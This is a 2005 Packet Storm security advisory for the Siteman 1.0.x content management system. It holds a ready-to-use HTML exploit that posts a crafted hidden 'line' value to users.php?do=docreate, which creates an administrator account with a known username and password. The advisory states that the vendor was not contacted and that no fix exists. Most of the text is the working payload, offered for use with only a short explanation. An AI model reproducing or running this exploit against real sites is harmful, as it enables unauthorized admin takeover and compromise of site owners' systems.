siteman.txt

2005-01-25T00:00:00
ID PACKETSTORM:35850
Type packetstorm
Reporter amironline452
Modified 2005-01-25T00:00:00

Description

                                        
                                            `  
  
God Admin Injection Vulnerability in Siteman 1.0.x,  
  
Discovered by PersianHacker.NET Security Team  
by amironline452 (amironline452 hotmail com)  
http://www.PersianHacker.NET  
http://www.amironline452.tk   
  
Siteman is a Content Management System (CMS) that is so easy to install and use, that  
a person who has no knowledge about creating homepages can get a profesionally  
looking website up and running in just minutes.  
  
More info @   
http://sitem.sourceforge.net/  
http://sourceforge.net/projects/sitem/  
  
Discussion:  
With this Vulnerability you can create God Admin user in Siteman v1.0.x.  
  
Exploiet:  
<html>  
<b>These data were recorded.</b><br /><br /><table cellspacing="0"   
cellpadding="2"><tr><td>Username(Use this, and not your display name,   
when   
logging in)</td><td   
align="right">amir452</td></tr><tr><td>Password</td><td   
align="right"><form><select><option>Click to show password</option>  
<option>amir452</option></select></form></td></tr><tr><td>Secret   
Question (Asked when you forget your password)</td><td   
align="right">amir452</td></tr><tr><td>Answer to secret   
question</td><td   
align="right"><form>  
<select>  
<option>Click to show answer</option>  
<option>amir452</option>  
</select></form>  
</td></tr><tr><td>Display name</td><td   
align="right">amir452</td></tr><tr><td>Member Level</td><td   
align="right"><b>5</b> (Admin)</td></tr><tr><td>email</td><td   
align="right">amir452@amir452.com</td></tr><tr><td>Hide my email   
adress</td><td align="right">no</td></tr><tr><td>Forum   
Signature</td><td   
align="right">hackers</td></table><br /><br />Is this correct?<br   
/><table   
cellspacing="0" cellpadding="3"><tr><td>  
  
<form action="users.php?do=new" method="post"><input type="submit"   
value="no" /></form></td><td>  
  
<form action="http://www.example.com/users.php?do=docreate"   
method="post">  
<input type="hidden" name="line"   
value="amir452|347a9a8a8d3f364f0bdb82c4208a3207|5|amir452@amir452.com|amir452|1105956827|amir452|347a9a8a8d3f364f0bdb82c4208a3207|0|0|0|hackers"   
/><input type="submit" value="yes" /></form></html>  
  
the above exploiet creat God Admin user with folowing info:  
username: amir452  
password: amir452  
  
Note:  
Script authors not contacted.  
There is no solution at this time.  
`